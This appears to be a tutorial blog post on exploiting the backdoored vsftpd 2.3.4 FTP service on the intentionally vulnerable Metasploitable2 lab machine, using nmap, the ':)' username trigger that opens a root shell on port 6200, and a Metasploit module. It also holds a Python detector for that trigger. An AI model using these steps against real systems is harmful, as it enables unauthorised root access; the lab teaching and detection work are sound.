This is the first of our many blog posts, in which we will be exploring different techniques to exploit the Metasploitable2 machine. In this post, I will focus on the FTP service, which is running the VSFTPD application.
The Metasploitable virtual machine created by Rapid7 is an intentionally vulnerable version of Ubuntu Linux designed for demonstrating common security vulnerabilities. This is the second version of Metasploitable and includes even more vulnerabilities than the original image. This virtual machine is compatible with VMware, VirtualBox and other common virtual machine platforms. Metasploitable’s network interfaces are, by default, bound to the NAT and Host-Only network adapters. A video tutorial on how to install Metasploitable on VirtualBox is available on the Rapid7 website.
After installing the virtual machine, go ahead and power it up; after it boots up, log in to the console with username msfadmin and password msfadmin. Use the ifconfig command to verify the IP address of the machine.
In our case, the IP address of the Metasploitable virtual machine is 10.0.19.235. The machine we will be using for attacking purposes runs Kali Linux with IP address 10.0.18.250.
From our attacking machine, we identify the open ports on this virtual machine using a little tool called nmap. The following command will scan for all 65535 TCP ports on our vulnerable virtual machine.
root@SPaWn:~# nmap -p1-65535 10.0.19.235
You can see lots of open ports in the above screenshot, but we will only focus on FTP port 21 for now.
We have made no secret of which application is running behind port 21 (VSFTPD), but in actual penetration testing scenarios we don’t know which service is running behind which port, so we will proceed as if we didn’t know either.
Let’s do a more in-depth scan against port 21 using nmap.
Nmap can also be used as a vulnerability scanner by leveraging the multitude of scripts provided with it. This “Scripting Engine” feature is what makes nmap a very powerful tool during penetration testing assignments.
Our scan clearly indicates that this version of vsFTPd contains a backdoor and can be exploited to gain a root shell. After going through the reference pages from our last nmap scan, we found out that if a username is sent that ends with a “:)” smiley face, the backdoored version of vsFTPd will open a listening shell on port 6200.
Let’s first check the status of port 6200 on our vulnerable virtual machine using netcat.
A “Connection refused” message signals that the port on the target machine is closed. Now connect to the FTP service and provide username: letmein:) and password: hahaha.
Let’s check the status of port 6200 now.
Our vulnerable machine is listening on port 6200 and connecting to this port now will give us a root shell.
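The trigger just described is easy to catch from the network side. The following Python is an added example, not code from the original post: it correlates FTP USER commands ending in the smiley with later connections to tcp/6200 from the same source. The event format and sample lines are constructed; they assume a sensor or FTP proxy that logs the USER argument, since vsftpd’s own log does not record enough to catch this.

```python
import re
from dataclasses import dataclass
from typing import Iterable

# Constructed sample events, one per line: "<ts> <src_ip> <kind> <detail>".
# Not real vsftpd logs; assumes a network sensor or FTP proxy feed.
SAMPLE_EVENTS = """\
1 10.0.18.250 FTP_CMD USER letmein:)
2 10.0.18.250 FTP_CMD PASS hahaha
3 10.0.18.250 TCP_CONNECT 10.0.19.235:6200
4 10.0.18.9 FTP_CMD USER anonymous
5 10.0.18.9 FTP_CMD PASS guest@
6 10.0.18.77 TCP_CONNECT 10.0.19.235:6200
""".splitlines()

# vsftpd 2.3.4 backdoor trigger: a USER argument ending with the ":)" smiley
SMILEY_USER = re.compile(r"^USER\s+.*:\)\s*$")
BACKDOOR_PORT = 6200


@dataclass(frozen=True)
class Alert:
    src_ip: str
    severity: str
    reason: str


def detect_vsftpd_backdoor(events: Iterable[str]) -> list[Alert]:
    """Flag smiley USER commands and connections to tcp/6200; raise the
    severity when the same source does both, which indicates the trigger
    succeeded and a shell was reached."""
    triggered: set[str] = set()
    alerts: list[Alert] = []
    for line in events:
        ts, src, kind, detail = line.split(" ", 3)
        if kind == "FTP_CMD" and SMILEY_USER.match(detail):
            triggered.add(src)
            alerts.append(Alert(src, "medium", f"backdoor trigger string in USER at t={ts}"))
        elif kind == "TCP_CONNECT" and detail.endswith(f":{BACKDOOR_PORT}"):
            if src in triggered:
                alerts.append(Alert(src, "high", f"connect to tcp/{BACKDOOR_PORT} after trigger at t={ts}"))
            else:
                alerts.append(Alert(src, "low", f"connect to tcp/{BACKDOOR_PORT} without observed trigger at t={ts}"))
    return alerts


if __name__ == "__main__":
    for alert in detect_vsftpd_backdoor(SAMPLE_EVENTS):
        print(alert)
```

A stand-alone connection to 6200 is only low severity here because, on a patched host, nothing listens there and the attempt simply fails; the high-severity case is the one worth paging on.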
To exploit this vulnerability using the Metasploit framework, type the command “msfconsole” at your Kali Linux command prompt. Once Metasploit is launched, search for “VSFTPD”. You will probably get only one hit for your search; select that exploit with the following command.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
After selecting your exploit, set the values to make the exploit work, such as the following:
set RHOST W.X.Y.Z
set PAYLOAD cmd/unix/interact
set LHOST A.B.C.D
set LPORT 12345
where W.X.Y.Z and A.B.C.D are the IP addresses of our target and attacking machines respectively. After setting the values for the VSFTPD backdoor exploit, we can use either the command “run” or “exploit” to fire the exploit against the target machine. A successful exploitation will get us a root shell.
Method-3: Exploit code
You can also write an exploit for this vulnerability in any language of your choice. Since we are already familiar with how this vulnerability affects the product, we are using an exploit written in our favorite language, Python. This exploit requires two parameters: the IP address of the target machine and the port number. After firing the exploit, we will get a root shell.